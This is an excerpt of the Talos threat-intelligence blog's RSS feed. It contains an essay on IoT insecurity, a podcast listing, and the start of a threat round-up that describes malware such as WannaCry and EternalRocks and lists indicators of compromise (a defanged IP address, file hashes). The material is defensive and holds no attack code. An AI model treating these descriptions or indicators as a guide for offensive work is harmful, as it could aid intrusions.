href="https://1.bp.blogspot.com/-KFNYx9tXAGw/WTrbkTtId_I/AAAAAAAABEo/JqHlpkBBuv8_63GMd1bzfej4GDfVLw-mACLcB/s1600/Image_Dropper_PhishingLure_malware4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-KFNYx9tXAGw/WTrbkTtId_I/AAAAAAAABEo/JqHlpkBBuv8_63GMd1bzfej4GDfVLw-mACLcB/s400/Image_Dropper_PhishingLure_malware4.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=PiuJF_Sg6Qw:JgJfwLtx5AI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/PiuJF_Sg6Qw" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-09T14:41:56.564-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s72-c/no-umbrella.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html</feedburner:origLink></item><item><title>The Internet of Vulnerable Things</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/dmOk9Z9E5Bo/the-internet-of-vulnerable-things.html</link><category>Internet of Things</category><category>IoT</category><category>vulnerabilities</category><category>Vulnerability</category><author>noreply@blogger.com (Martin Lee)</author><pubDate>Tue, 06 Jun 2017 10:00:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6263027603040693062</guid><description>&lt;h2&gt;Introduction&lt;/h2&gt;&lt;br /&gt;Technological progress is resulting in computing systems that are smaller, cheaper and consuming less power. These micro-computing systems are able to be integrated into everyday objects; when coupled with ubiquitous wireless connectivity these devices form the “Internet of Things”. The IoT has the potential to improve our lives, but only if we correctly manage the security risks which are inherent to these devices. &lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.gartner.com/newsroom/id/3165317"&gt;Gartner tells us&lt;/a&gt; that 6.4 billion internet connected devices were in use worldwide in 2016, and that figure will reach 20.8 billion by 2020.  That equates to nearly 10 million new devices being connected every single day for the next 4 years, massively expanding the potential attack surface of unsecured devices. As businesses deploy these systems to make decisions about operational improvement, or build their business strategies around the IoT, we must consider the vulnerability of the devices and the veracity of the data they generate.&lt;br /&gt;&lt;br /&gt;IoT security interests Cisco and Talos greatly. As part of our goal to force the bad guys to innovate, we seek out and work with vendors to fix vulnerabilities before they can be abused. For example, we identified &lt;a href="http://blog.talosintelligence.com/2016/02/trane-iot.html "&gt;hard coded credentials&lt;/a&gt; within Trane thermostats. If discovered by a threat actor, they could have remotely logged into the thermostats and gained complete control of the devices. From there they would be able to conduct reconnaissance of local networks to launch attacks. We developed protection for our customers, and held off disclosing the vulnerability until the vendor released a patch to resolve the issue.&lt;br /&gt;&lt;br /&gt;An insecure IoT device connected to a corporate network is just another computer that can offer a point of ingress for attackers. Once compromised, an attacker can use an IoT device to gather information from the network or launch attacks against other systems. However, unlike most networked computers, the IoT device is unlikely to have anti-virus software or security software installed on it. This means that an attacker can lurk there for extended periods with little risk of discovery. &lt;br /&gt;&lt;br /&gt;Criminals are aware of the opportunities posed by the IoT. They have “recruited” poorly secured IoT devices  to form the &lt;a href="https://umbrella.cisco.com/blog/blog/2017/01/05/future-assaulting-internet-mirai/"&gt;Mirai botnet&lt;/a&gt;, which launched the largest denial of service (DoS) attack in history, using the stolen computing power and Internet connectivity of insecure devices to disrupt services offered by Twitter, Paypal, Spotify and other sites off and on over an entire day. Criminals have also compromised vulnerable digital video recorders used in closed-circuit television (CCTV) systems. Not to wipe incriminating video surveillance footage, but to install malware to steal processing capacity and use it to &lt;a href="https://arstechnica.com/security/2014/05/infecting-dvrs-with-bitcoin-mining-malware-even-easier-you-suspected/"&gt;mine bitcoins&lt;/a&gt; in order to make money.&lt;br /&gt;&lt;br /&gt;  Not only may the devices themselves be vulnerable, but the systems that use data collected from IoT devices can be leveraged to conduct some interesting attacks. For example, a team of Israeli researchers discovered that they could fool traffic information systems into believing that there was a fake traffic jam by &lt;a href="http://www.wired.co.uk/article/waze-hacked-fake-traffic-jam"&gt;spoofing traffic&lt;/a&gt; data from bogus IoT devices.&lt;br /&gt;&lt;br /&gt;Insecure IoT devices that interact with the physical world can be compromised to alter their function. For example, electronic hotel locks allow visitors to use keycards to access their rooms. However, the communications port on these devices can be hacked to take advantage of inadequate security features on the lock to allow anyone with the &lt;a href="https://www.engadget.com/2012/07/24/hacker-finds-flaw-in-hotel-locks/"&gt;necessary knowledge&lt;/a&gt; to open the door without a key.&lt;br /&gt;&lt;br /&gt;Even unlikely items such as toys and homeware can be considered as IoT devices, and found to include network vulnerabilities. Hackers can &lt;a href="http://www.pcworld.com/article/3012220/security/internet-connected-hello-barbie-doll-can-be-hacked.html"&gt;compromise&lt;/a&gt; a connected Barbie to spy on you, and &lt;a href="http://www.inc.com/joseph-steinberg/baby-monitors-are-vulnerable-to-hackers-here-s-how-to-secure-yours.html"&gt;subvert&lt;/a&gt; baby monitors to monitor you and your children. You can even be “watched” through your &lt;a href="https://www.forbes.com/sites/thomasbrewster/2017/03/07/cia-wikileaks-samsung-smart-tv-hack-security/"&gt;Smart TV&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Pressures Lead to IoT Security Issues&lt;/h2&gt;&lt;br /&gt;As the world builds the infrastructure and deploys the devices that comprise the IoT, we as a society have the opportunity to apply the decades of good practices learnt as part of the development of the Internet – including painful lessons about the importance of security.&lt;br /&gt;&lt;br /&gt;The premise of the IoT is built upon the idea of deploying many cheap, Internet-connected devices in many places. As the market develops, manufacturers are hurrying to bring devices to market at the lowest price possible, and few buyers are insisting upon security requirements as part of their procurement processes. This means that many IoT products are sold containing known vulnerabilities without, or with little thought to, how updates can be applied to devices in order to remediate security issues.&lt;br /&gt;&lt;br /&gt;Considering security issues early in the design phases means that protection can be built-in within a system. Every feature of an IoT system – from the device itself, to the wireless communications, to the user interface, to the management interface – are associated with weaknesses which are well known and characterized. Similarly, defenses against these types of weaknesses are also well known. Specifying that security is a requirement for a system, and pinpointing the types of protection that are needed, leads to a system that is more resilient and less likely to be compromised, less likely to suffer major losses when a compromise occurs and easier to update to remediate issues when they are discovered.&lt;br /&gt;&lt;br /&gt;Not addressing security issues comes at a heavy cost. Installing insecure electronic locks means that the locks might as well not be there. They can be hacked to open for anyone. Deploying insecure devices that connect to a corporate network is like leaving an office door unlocked overnight, allowing anyone to creep in and take what they wish. Vulnerable IoT products may be banned outright, e.g. the &lt;a href="http://www.reuters.com/article/us-germany-cyber-dolls-idUSKBN15W20Q"&gt;Internet-connected&lt;/a&gt; doll, Cayla, in Germany.&lt;br /&gt;&lt;br /&gt;Security issues present in many forms. Resolving any single issue first requires awareness of the problem, an understanding how the issue has come about and how it can be remediated or mitigated against. Only then can we put the correct security strategy in place.&lt;br /&gt;&lt;br /&gt;Software vulnerabilities are one such security issue affecting the IoT. Talos has a dedicated team hunting for software vulnerabilities in IoT and other systems. When we find a new vulnerability, we follow our published &lt;a href="http://blog.talosintelligence.com/2016/11/talos-responsible-disclosure-policy.html"&gt;Responsible Disclosure Policy&lt;/a&gt; to ensure that our customers are protected and that the problem gets fixed. By sharing these findings, we can inform and protect the community at-large and contribute to the discussion on securing the IoT.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt; “Tricking” The IoT &lt;/h2&gt;&lt;br /&gt;Anyone who has been involved in writing code, or ensuring that an IT project is completed as required, on time, and on budget, will agree that writing software is hard. Creating software-based systems that meet requirements is difficult enough. To be secure, the system must not only do what it is supposed to do, but never do anything else.&lt;br /&gt;&lt;br /&gt;Vulnerabilities are simply weaknesses in a system that can be used to “trick” a system into doing something that it wasn’t supposed to do. Often, vulnerabilities lurk undiscovered because we need a specific set of circumstances to find them, i.e. we won’t encounter them unless we specifically probe for them. Once an adversary discovers them, they gain access to resources and data, or even the ability to run code in ways that the system designers never imagined or wanted.&lt;br /&gt;&lt;br /&gt;Any system containing software will almost certainly include vulnerabilities. In this respect, the IoT is no different from any other computer device. Continuously considering security as part of the requirements, system design and development will help identify potential mistakes early so that they can be rectified. The further down the development process that a security issue is identified, the more expensive it is to fix.&lt;br /&gt;&lt;br /&gt;Despite best efforts, it is almost certain that a final system will contain vulnerabilities. Encouraging the responsible disclosure of vulnerabilities combined with a rapid “fix” process helps minimize risk and exposure to harm. It also means that the software engineering community can learn for the mistakes of others and not make the same mistakes twice.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;IoT Risks In Real Life&lt;/h2&gt;&lt;br /&gt;One of the key issues that Talos sees time and again is hard coded usernames and passwords within systems. When discovered, an attacker can uses these to gain access to all the devices that share these default credentials across the world. Just last year we disclosed this exact issue within &lt;a href="http://blog.talosintelligence.com/2016/02/trane-iot.html"&gt;Trane thermostats&lt;/a&gt;. We worked with Trane to ensure that the problem was fixed.&lt;br /&gt;&lt;br /&gt;IoT systems require management interfaces to control the operation of the devices, and to process collected data. In addition, we recently discovered a way that attackers could take control of an IoT installation controlled by &lt;a href="http://blog.talosintelligence.com/2017/03/vulnerability-spotlight-code-execution.html"&gt;LabVIEW&lt;/a&gt; and also found how attackers can exploit an &lt;a href="http://blog.talosintelligence.com/2017/01/Aerospike.html"&gt;Aerospike&lt;/a&gt; database to take control of the platform.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;What Needs to Change&lt;/h2&gt;&lt;br /&gt;Nothing will change unless people are aware of the issue. Being open about vulnerabilities when they are encountered helps users consider their own security requirements and assess additional security features that they may wish to deploy. It helps them prioritize their patching regimen, or even better, simply inform them as to why an automated system update has been applied. Keeping quiet about security issues benefits nobody except attackers who wish to use the vulnerability to attack systems.&lt;br /&gt;&lt;br /&gt;Vendors must ensure that the software they develop is designed, developed and tested to be as secure as possible. Despite best efforts, hackers will discover vulnerabilities and systems will need to be patched. Making the patching process as quick and easy as possible (preferably automated) enables the distribution of security updates, with new features and functionality. For businesses and consumers to truly embrace the convenience and power of IoT, they must feel fully confident that we’re building IoT with security foremost in mind.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Protecting Your Systems&lt;/h2&gt;&lt;br /&gt;The upshot: Make security part of the procurement process. Ask vendors about how they discover and resolve vulnerabilities. If their answers don’t meet your expectations, don’t make the purchase.&lt;br /&gt;&lt;br /&gt;Segment networks that contain IoT devices. There is no need to have a potentially vulnerable connected thermostat on the same network as your customer database. Separate networks so that, if a device does become compromised, the potential for damage is limited.&lt;br /&gt;&lt;br /&gt;Protect IoT devices with appropriate network security measures. IoT devices are computers and require the same security measures as any other networked machine. Protect them with firewalls to block unpermitted network connections, and use IDS/IPS systems to block and alert on the presence unauthorized network traffic.&lt;br /&gt;&lt;br /&gt;Plan how you will keep systems fully patched, how you will learn about required patches, and what you will do if a vendor is unwilling or unable to release a patch.&lt;br /&gt;&lt;br /&gt;Don’t overlook management systems. Databases and dashboards are associated with many security risks, notably that of authenticating users and assuring the integrity of data collection. Verify that a single compromised device can’t result in the leakage or deletion of your entire database. Similarly, ensure that a graphical front end isn’t vulnerable to Cross Site Scripting (XSS) attacks that could lead to an attacker gaining access to sensitive systems.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;IoT systems have the capability to make great changes to our professional and personal lives. The IoT has the capability to reduce waste, improve efficiency, and create new markets through new opportunities and newly gathered data. &lt;br /&gt;&lt;br /&gt;In other words, the IoT will enable our societies to grow, progress and improve. But we must feel confident in the security of these devices to fully realize their benefits. We know how IoT systems can be attacked and subverted. We know the consequences of such attacks, and we know how these attacks can be defended and mitigated against. &lt;br /&gt;&lt;br /&gt;Society can protect IoT systems from harm, but only if that protection is insisted upon by those who are deploying, purchasing and delivering the systems.  Buyers must demand better security, and manufacturers must understand the gravity of the situation. No longer can they simply strive to be first to market; they must also strive to be the safest to market. If we all start demanding better security, manufacturers will make safety a priority.&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=dmOk9Z9E5Bo:jpni69fjZqw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/dmOk9Z9E5Bo" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-06T15:16:06.028-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html</feedburner:origLink></item><item><title>BWT EP5 - It Has Been 0-days Since This Term was Abused</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/A9hZU268Umk/bwt-ep5-it-has-been-0-days-since-this.html</link><author>noreply@blogger.com (Mitch Neff)</author><pubDate>Tue, 30 May 2017 11:42:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4626956592715610132</guid><description>Beers with Talos Episode 5 "It Has Been 0-days Since This Term was Abused" is now available&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Listen here:&lt;/h4&gt;Listen via&amp;nbsp;&lt;a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"&gt;iTunes&lt;/a&gt;&lt;br /&gt;Listen directly on the &lt;a href="https://www.talosintelligence.com/podcasts"&gt;Talos Podcasts&lt;/a&gt; page.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s1600/Twitter_organictimeline2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="512" data-original-width="1024" src="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s1600/Twitter_organictimeline2.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Episode Notes:&lt;/h3&gt;&lt;div&gt;The crew talks about the potential of Samba echoing WannaCry and blocking SMB ports (but you already did that, RIGHT?).  We discuss some history lessons and give proper usage guidance on words like 0-days, backdoors, and other terms that the industry loves to hype and abuse for extra clicks.&lt;/div&gt;&lt;div&gt;What we learn in the Roundtable this week: Joel struggles to resolve the conflicts inherent in his design choices, Nigel’s daughter steals high-end electronics, Matt gaslights first responders in a major American city, Craig learns the JRE sandbox is a silver bullet, and Mitch issues a passive aggressive non-apology for just trying to make you happy.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h4&gt;Feedback question: &lt;/h4&gt;&lt;/div&gt;&lt;div&gt;What is stuck in Joel’s head? Tweet us &lt;a href="https://twitter.com/TalosSecurity"&gt;@TalosSecurity&lt;/a&gt;, use #BWT (also, what does #BWT mean?)&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Topic table:&lt;/h3&gt;11:45 - Samba and why linux worms are hard. Really hard. And seriously, block 445.&amp;nbsp;&lt;/div&gt;&lt;div&gt;22:56 - When being a victim of a cyberattack is kiiinda your fault&lt;/div&gt;&lt;div&gt;25:45 - Sometimes patching is impossible&lt;/div&gt;&lt;div&gt;27:20 - Words mean things - Backdoors, 0-Days, and such&lt;/div&gt;&lt;div&gt;38:55 - Checkboxes will not save your butt when you must adjust fire.&lt;/div&gt;&lt;h4&gt;Referenced Links:&lt;/h4&gt;&lt;div&gt;Talos WannaCry Post - &lt;a href="http://blog.talosintelligence.com/2017/05/wannacry.html"&gt;http://blog.talosintelligence.com/2017/05/wannacry.html&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Talos Samba Post - &lt;a href="http://blog.talosintelligence.com/2017/05/samba-vuln-details.html"&gt;http://blog.talosintelligence.com/2017/05/samba-vuln-details.html&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Talos SSH Post - &lt;a href="http://blog.talosintelligence.com/2015/04/threat-spotlight-sshpsychos.html"&gt;http://blog.talosintelligence.com/2015/04/threat-spotlight-sshpsychos.html&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Federal News Radio - &lt;a href="https://federalnewsradio.com/technology/2016/10/hackers-not-yet-pulling-big-guns-data-breaches-nsa-official-warns/"&gt;https://federalnewsradio.com/technology/2016/10/hackers-not-yet-pulling-big-guns-data-breaches-nsa-official-warns/&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;==========&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Featuring&amp;nbsp;&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://twitter.com/security_craig"&gt;Craig Williams&lt;/a&gt;, &lt;a href="https://twitter.com/joelesler"&gt;Joel Esler&lt;/a&gt;, &lt;a href="https://twitter.com/kpyke"&gt;Matt Olney&lt;/a&gt;, and &lt;a href="https://twitter.com/englishlfc"&gt;Nigel Houghton&lt;/a&gt;.&lt;/div&gt;&lt;h4&gt;Hosted by&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="https://twitter.com/mitchneff"&gt;Mitch Neff&lt;/a&gt;.&lt;/div&gt;&lt;h4&gt;&lt;/h4&gt;&lt;h4&gt;Find all episodes&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talospodcast"&gt;http://cs.co/talospodcast&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Subscribe via iTunes&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talositunes"&gt;http://cs.co/talositunes&lt;/a&gt;&amp;nbsp;(and leave a review!)&lt;/div&gt;&lt;h4&gt;&lt;br /&gt;Check out the Talos Threat Research Blog&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talosresearch"&gt;http://cs.co/talosresearch&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Subscribe to the Threat Source newsletter&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talosupdate"&gt;http://cs.co/talosupdate&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Follow Talos on Twitter&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talostwitter"&gt;http://cs.co/talostwitter&lt;/a&gt;&lt;/div&gt;&lt;h4&gt;&lt;br /&gt;Give us your feedback and suggestions for topics&lt;/h4&gt;&lt;div&gt;&lt;a href="mailto:beerswithtalos@cisco.com"&gt;beerswithtalos@cisco.com&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=A9hZU268Umk:wFg39nIqAD4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/A9hZU268Umk" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-31T11:52:05.993-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s72-c/Twitter_organictimeline2.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/bwt-ep5-it-has-been-0-days-since-this.html</feedburner:origLink></item><item><title>Threat Round-up for May 19 - May 26</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/ap40FDe81Ss/threat-roundup-0519-0526.html</link><category>AMP</category><category>ClamAV</category><category>Coverage</category><category>Snort</category><category>threats</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 26 May 2017 09:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4324224048629176314</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 19 and May 26. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Pdf.Tool.HeapSprayHeuristic-6316003-1&lt;/b&gt;&lt;br /&gt;JS Heap Spray&lt;br /&gt;PDFs leverage embedded JavaScript to exploit vulnerabilities or at the very least gain access to additional functionality provided by JavaScript. Typical exploitation techniques require a heap spray where JavaScript is used to copy the same data many times throughout the process' memory.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.Terdot-6320310-0&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This dropper is served by Terror exploit kit, which will inject process like Explorer, to perform download for additionals binaries, and continue infection. The Dropper similar has been seen to deploy Zeus variants&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Vbkrypt-10134&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;VbKrypt is a VisualBasic based trojan. It can be leveraged to perform any nefarious action on the infected system such as installing additional malware, logging keystrokes, stealing files, or remotely controlling the system.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.EternalRocks1&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Eternalrock uses seven NSA exploits to infect victims and the CnC communication is based on Tor. The exploits are downloaded after 24h and then the samples start scanning the internet for vulnerable SMB services. The first stage downloads some necessary components and then drops another samples that has the described behavior.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Adylkuzz-6317076-0&lt;/b&gt;&lt;br /&gt;Miner&lt;br /&gt;Adylkuzz is a cryptocurrency miner used to mine the Monero cryptocurrency.  It has seen a recent increase in installations from attackers using EternalBlue and DoublePulsar. See http://blog.talosintelligence.com/2017/05/adylkuzz-uiwix-eternalrocks.html for more information.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.WannaCry&lt;/b&gt;&lt;br /&gt;Ransomware Worm&lt;br /&gt;The malware then has the capability to scan heavily over TCP port 445 (Server Message Block/SMB), spreading similar to a worm, compromising hosts, encrypting files stored on them then demanding a ransom payment in the form of Bitcoin. It is important to note that this is not a threat that simply scans internal ranges to identify where to spread, it is also capable of spreading based on vulnerabilities it finds in other externally facing hosts across the internet.  http://blog.talosintelligence.com/2017/05/wannacry.html&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Jaff&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Jaff is ransomware that is primarily spread via large scale email campaigns. See the Talos Blog https://blog.talosintelligence.com/2017/05/jaff-ransomware.html for more information about this threat.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Pdf.Tool.HeapSprayHeuristic-6316003-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;526fef47936e460808fff7c605ee12e2cebe50234e7731680b545fb0863a6245&lt;/li&gt;&lt;li&gt;1b955f1bdc1eb61524cbd6caff84d1690551a5f7cb07b67e65cec78406c562c6&lt;/li&gt;&lt;li&gt;303aa9197752835d7f677a9961973371f8277f095768ad13df4b29f00a3206ff&lt;/li&gt;&lt;li&gt;594e36206836ac8a910adc18b412ed1c6c0bf5b46b90675b25bbbd6a7d9d238b&lt;/li&gt;&lt;li&gt;6a09e69f91c613b8b5b71cafd6ccb8fb2145892e3db2015228e0a27d18850a3c&lt;/li&gt;&lt;li&gt;8981e4350f4029e50f683b03938d55feae334e6873ccedff84e9b722bf99cc5d&lt;/li&gt;&lt;li&gt;a0dba623d4dc2b4fa03c0893ad08030a21401581a43ac0ebb6170a3ebc7b1eef&lt;/li&gt;&lt;li&gt;a80528b75ba4f54800a2008c83adc147fcdfe3dc097cb92a4925df18c01b0e0f&lt;/li&gt;&lt;li&gt;b1c3f1633acc80169cfe12ed884eed0d5d8912a28e05c43a9290113df4684bfd&lt;/li&gt;&lt;li&gt;f2ade3ddc5aa8cf52e01c0eba084a16eecb217b421c87e739223aff0cf8237cc&lt;/li&gt;&lt;li&gt;0567f4f2b9038c3a14eb5224140f22d7f07f99ca47b1d78d661343ef5cd50f5a&lt;/li&gt;&lt;li&gt;13220c18bd003aabd0260bbd40577aa3df827074ee72940e1dc76c746037e3a6&lt;/li&gt;&lt;li&gt;20ebeb7a52b841a483a1a1cb4337b529c7ad873b400009e52876c07291c46126&lt;/li&gt;&lt;li&gt;2341bb05ff14d4bae8b1c14fa9c709d5cec15ca3e0af6dbddf58d2d9d2ff4518&lt;/li&gt;&lt;li&gt;3385717cf4ceecad964116000d5394c52c3aa215fe483046c764c69490b75337&lt;/li&gt;&lt;li&gt;39a9434665b02c1598e94b8aa73b67ccd6d848ec34cfd0c49bc56d9c02032e8b&lt;/li&gt;&lt;li&gt;4ffd0c052cdba787983d6e05260fd1cac66f3550cbabf55b297cd099d1ede8be&lt;/li&gt;&lt;li&gt;60d47e644f644aa6f2842a118ee32cf2f16eb9f6726cf6b9d2ffdb5812be3cf1&lt;/li&gt;&lt;li&gt;6a72fe8202c34d505ca13ca34c48fc3398569cf5944b456711c115cdb9e38213&lt;/li&gt;&lt;li&gt;7a5c157a670543cba8bdda942636e43ad9a95c8265091b1e1e3f20a9c0407031&lt;/li&gt;&lt;li&gt;7ffc81ebfc069c013205e045d5f984f6017c7503dfaaed9728c315de68dceebe&lt;/li&gt;&lt;li&gt;a4ee1555b4586e3f28281ef0f2a367bca417de496d3224e473d6cf874a6abc22&lt;/li&gt;&lt;li&gt;ab01b3d5b25265b38eb8dfdfdc6a7e67eebee5c6cbde9afcf66442a82c01bf06&lt;/li&gt;&lt;li&gt;bb5cb32aff4fbaa252a4d2bc581e4777d4c106804a7e1f4092799be863baaa52&lt;/li&gt;&lt;li&gt;cf14adcac22fc30533057eccd40a82ff41eff433263b43c94515c94c5106460a&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" 